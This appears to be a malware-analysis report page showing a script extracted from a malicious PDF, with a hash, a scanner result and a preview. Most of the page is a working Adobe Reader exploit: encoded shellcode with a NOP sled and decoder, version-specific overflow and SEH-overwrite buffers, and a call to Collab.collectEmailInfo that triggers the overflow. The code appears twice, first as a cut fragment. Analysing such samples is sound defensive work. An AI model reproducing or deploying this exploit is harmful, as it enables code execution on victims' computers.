41%u6444%u5841%u5841%u4f42%u6546%u4643%u4f42%u6546%u6641%u4f42%u4546%u7844%u6b41%u7942%u6e43%u4b48%u4543%u5a43%u4b48%u6546%u4643%u4b48%u4e42%u734b%u484b%u484b%u484b%u484b%u4148%u7342%u5241%u5241%u5241%u5241%u6e43%u7142%u5942%u5a41%u6d48%u6b41%u7342%u6b48%u5242%u4a42%u6b41%u7942%u5943%u4d48%u4d43%u4646%u5843%u4f42%u6546%u5a43%u4b48%u4546%u4643%u5a43%u4f42%u6546%u4a43%u4f42%u4546%u4441%u4b48%u4546%u4646%u7141%u4546%u5243%u4348%u7543%u5243%u5841%u7743%u6b48%u4f42%u6546%u4a43%u4f42%u4546%u6444%u7342%u7643%u6842%u5242%u6346%u4b42%u5748%u4d42%u5741%u6b41%u7a42%u4a48%u5343%u4743%u6344%u7742%u774b%u7843%u6346%u5745%u6e41%u6548"+
"%u4f41%u5841%u7443%u4e41%u6d43%u4a42%u4841%u4741%u7143%u5241%u5842%u6c48%u5041%u6a42%u6646%u6d48%u534b%u7543%u6f42%u5848%u4e42%u4a48%u5641%u5445%u5748%u6344%u5441%u7841%u4943%u6b43%u7a43%u6743%u5a43%u6c43%u6b41%u6a41%u7641%u6d43%u7043%u6d43%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u6a48%u6a48%u6a48%u6a48%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5842%u5841%u5841%u5841%u5841%u5543%u4148%u5545%u6b43%u5841%u5841%u5841%u5842%u6442%u4e42%u4f42%u4f42%u4b48%u6845%u4b48%u4542%u4b48%u4e42%u4b48%u7645%u4348%u7142%u6841%u5842%u6f48%u4e42%u4f42%u4f42%u6b41%u7942%u4948%u4543%u6641%u4348%u4d43%u6641%u6444%u6b41%u7942%u5943%u4f42%u6546%u6641%u4f42%u4546%u4444%u6541%u5841%u5348%u6744%u5841%u7a43%u5445%u6541%u5841%u5648%u6744%u5841%u6746%u5542%u6b41%u7942%u5943%u5943%u7846%u4843%u6744%u5841%u5841%u4f42%u6546%u6641%u4f42%u4546%u7841%u6b41%u7942%u5943%u4d48%u4d43%u5a43%u5843%u4943%u7142%u5142%u5a41%u5943%u4d48%u4d43%u4e43%u5843%u4f42%u6546%u6641%u4f42%u4546%u7844%u6b41%u7942%u5943%u5943%u7846%u4c43%u6744%u5841%u5841%u4f42%u6546%u6641%u4f42%u4546%u7841%u7846%u4f42%u5841%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u4243%u5843%u7846%u4f42%u5841%u5841%u5841%u4f42%u4546%u5041%u4f42%u6546%u4243%u4f42%u4546%u5441%u4546%u6b41%u7942%u5943%u7846%u484b%u5841%u5841%u5841%u6243%u5a41%u5943%u4943%u5943%u7846%u5841%u5841%u5841%u4843%u4d48%u4d43%u6841%u5843%u4348%u4d43%u4c41%u6544%u5345%u5241%u4b48%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43"+
"%u4c41%u5842%u4142%u4f42%u4f42%u4f42%u5543%u4348%u4842%u4f42%u6546%u5a41%u5345%u6141%u4948%u4d43%u4a43%u7846%u5841%u6444%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u4643%u4b48%u4d43%u4e43%u4948%u4d43%u5243%u5842%u6e43%u4e42%u4f42%u4f42%u4546%u6b41%u7942%u5943%u4d48%u4d43%u6841%u5843%u4348%u4d43%u7041%u6544%u5345%u5241%u4b48%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43%u7041%u5842%u4142%u4f42%u4f42%u4f42%u5543%u6243%u5841%u4f42%u4546%u5841%u5048%u5048%u5048%u5048%u3030");
  
if (app.viewerVersion >= 7.0)
{
    plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + sc + re(1256,unescape("%u4141%u4141"));
} 
else 
{
   ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
   plin = re(80,unescape("%u9090%u9090")) + sc + re(80,unescape("%u9090%u9090"))+ 
          unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + 
          unescape("%uf2eb%uf1eb");
   while ((plin.length % 8) != 0) 
       plin = unescape("%u4141") + plin;
   plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
    this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}
//start完毕
var shaft= app.setTimeOut("start()",1200);
generic_stage_recovery_002.js deobfuscated-js generic stage recovery null-collapse -> split-literal-normalize from JavaScript object 20 at offset 0x77DB4 4540 bytes
SHA-256: 3006282805cdcacadde9249fbd866cc7960037c866f8594b55157fb9aa4c1449
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 16 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
��function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{  
  sc = unescape("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u58c0%u8a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3%uffff%u5048%u5048%u5048%u5048%u5942%u6841%u5941%u5841%u5841%u6d48%u5843%u5a43%u5842%u7841%u5841%u5841%u5841%u4948%u6744%u4348%u7442%u5041%u4348%u7742%u6444%u6341%u4142%u6546%u5445%u7342%u6b41%u7042%u6c43%u4b48%u4843%u6841%u4b48%u4843%u5441%u4b48%u7843%u4441%u6d48%u4b48%u4843%u5041%u5345%u5841%u7342%u6843%u4b48%u6443%u4444%u4444%u4b48%u4d43%u6441%u4b48%u4446%u7041%u7043%u6344%u6542%u4b48%u4243%u7844%u4b48%u5243%u7841%u6344%u6d42%u5342%u6c41%u4143%u4b48%u6c41%u4b48%u6344%u4542%u6b41%u4f42%u6b41%u7042%u4c42%u6c48%u4448%u7042%u6446%u6744%u7142%u7745%u5541%u6344%u4842%u5345%u4442%u6341%u7443%u4444%u7041%u6546%u5142%u4b48%u5243%u4444%u6344%u6d42%u6e43%u4b48%u5441%u4343%u4b48%u5243%u4441%u6344%u6d42%u4b48%u6444%u4b48%u6344%u7542%u4948%u4c43%u4444%u4441%u6943%u7342%u6b41%u7942%u5943%u4d48%u4d43%u5a43%u5843%u7846%u5841%u6444%u5841%u5841%u4f42%u6546%u4643%u4f42%u6546%u6641%u4f42%u4546%u7844%u6b41%u7942%u6e43%u4b48%u4543%u5a43%u4b48%u6546%u4643%u4b48%u4e42%u734b%u484b%u484b%u484b%u484b%u4148%u7342%u5241%u5241%u5241%u5241%u6e43%u7142%u5942%u5a41%u6d48%u6b41%u7342%u6b48%u5242%u4a42%u6b41%u7942%u5943%u4d48%u4d43%u4646%u5843%u4f42%u6546%u5a43%u4b48%u4546%u4643%u5a43%u4f42%u6546%u4a43%u4f42%u4546%u4441%u4b48%u4546%u4646%u7141%u4546%u5243%u4348%u7543%u5243%u5841%u7743%u6b48%u4f42%u6546%u4a43%u4f42%u4546%u6444%u7342%u7643%u6842%u5242%u6346%u4b42%u5748%u4d42%u5741%u6b41%u7a42%u4a48%u5343%u4743%u6344%u7742%u774b%u7843%u6346%u5745%u6e41%u6548"+
"%u4f41%u5841%u7443%u4e41%u6d43%u4a42%u4841%u4741%u7143%u5241%u5842%u6c48%u5041%u6a42%u6646%u6d48%u534b%u7543%u6f42%u5848%u4e42%u4a48%u5641%u5445%u5748%u6344%u5441%u7841%u4943%u6b43%u7a43%u6743%u5a43%u6c43%u6b41%u6a41%u7641%u6d43%u7043%u6d43%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u6a48%u6a48%u6a48%u6a48%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5842%u5841%u5841%u5841%u5841%u5543%u4148%u5545%u6b43%u5841%u5841%u5841%u5842%u6442%u4e42%u4f42%u4f42%u4b48%u6845%u4b48%u4542%u4b48%u4e42%u4b48%u7645%u4348%u7142%u6841%u5842%u6f48%u4e42%u4f42%u4f42%u6b41%u7942%u4948%u4543%u6641%u4348%u4d43%u6641%u6444%u6b41%u7942%u5943%u4f42%u6546%u6641%u4f42%u4546%u4444%u6541%u5841%u5348%u6744%u5841%u7a43%u5445%u6541%u5841%u5648%u6744%u5841%u6746%u5542%u6b41%u7942%u5943%u5943%u7846%u4843%u6744%u5841%u5841%u4f42%u6546%u6641%u4f42%u4546%u7841%u6b41%u7942%u5943%u4d48%u4d43%u5a43%u5843%u4943%u7142%u5142%u5a41%u5943%u4d48%u4d43%u4e43%u5843%u4f42%u6546%u6641%u4f42%u4546%u7844%u6b41%u7942%u5943%u5943%u7846%u4c43%u6744%u5841%u5841%u4f42%u6546%u6641%u4f42%u4546%u7841%u7846%u4f42%u5841%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u4243%u5843%u7846%u4f42%u5841%u5841%u5841%u4f42%u4546%u5041%u4f42%u6546%u4243%u4f42%u4546%u5441%u4546%u6b41%u7942%u5943%u7846%u484b%u5841%u5841%u5841%u6243%u5a41%u5943%u4943%u5943%u7846%u5841%u5841%u5841%u4843%u4d48%u4d43%u6841%u5843%u4348%u4d43%u4c41%u6544%u5345%u5241%u4b48%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43"+
"%u4c41%u5842%u4142%u4f42%u4f42%u4f42%u5543%u4348%u4842%u4f42%u6546%u5a41%u5345%u6141%u4948%u4d43%u4a43%u7846%u5841%u6444%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u4643%u4b48%u4d43%u4e43%u4948%u4d43%u5243%u5842%u6e43%u4e42%u4f42%u4f42%u4546%u6b41%u7942%u5943%u4d48%u4d43%u6841%u5843%u4348%u4d43%u7041%u6544%u5345%u5241%u4b48%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43%u7041%u5842%u4142%u4f42%u4f42%u4f42%u5543%u6243%u5841%u4f42%u4546%u5841%u5048%u5048%u5048%u5048%u3030");
  
if (app.viewerVersion >= 7.0)
{
    plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + sc + re(1256,unescape("%u4141%u4141"));
} 
else 
{
   ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
   plin = re(80,unescape("%u9090%u9090")) + sc + re(80,unescape("%u9090%u9090"))+ 
          unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + 
          unescape("%uf2eb%uf1eb");
   while ((plin.length % 8) != 0) 
       plin = unescape("%u4141") + plin;
   plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
    this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}
//start[�k�
var shaft= app.setTimeOut("start()",1200);

Open this report in the interactive analyzer, or submit your own file for analysis.